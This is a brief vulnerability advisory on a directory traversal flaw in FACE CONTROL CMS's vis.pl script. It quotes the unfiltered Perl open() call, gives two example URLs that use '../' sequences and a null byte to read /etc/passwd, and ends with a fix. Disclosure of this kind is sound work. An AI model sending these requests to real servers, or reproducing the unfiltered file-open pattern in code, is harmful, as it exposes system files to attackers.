 FACE CONTROL CMS vis.pl Directory Traversal
------------------------------------------------------------------------

SUMMARY

<http://www.elido.com/cgi-bin/e-cms/vis/vis.pl?s=001&p=0009&g=> FACE
CONTROL- CMS The E-cms vis.pl script does not filter for dangerous
characters, allowing attackers to open arbitrary files.

DETAILS

c

Vulnerable Code:
if ( -e $datFile )
{
 open ( DAT_FILE, "$datFile" );

Example:
All variables that open files are unsafe:
http://[target]/cgi-bin/e-cms/vis/vis.pl?s=001&p=../../../..
/etc/passwd%00

http://[target]/cgi-bin/e-cms/vis/vis.pl?s=../../../../etc/passwd%00

Solution:
Remove vis.pl from your system if it is unused.
Filter or escape dangerous characters from all the user parameters.
You have to insert a line like this for ALL variables which contain files
to open, system calls and SQL.
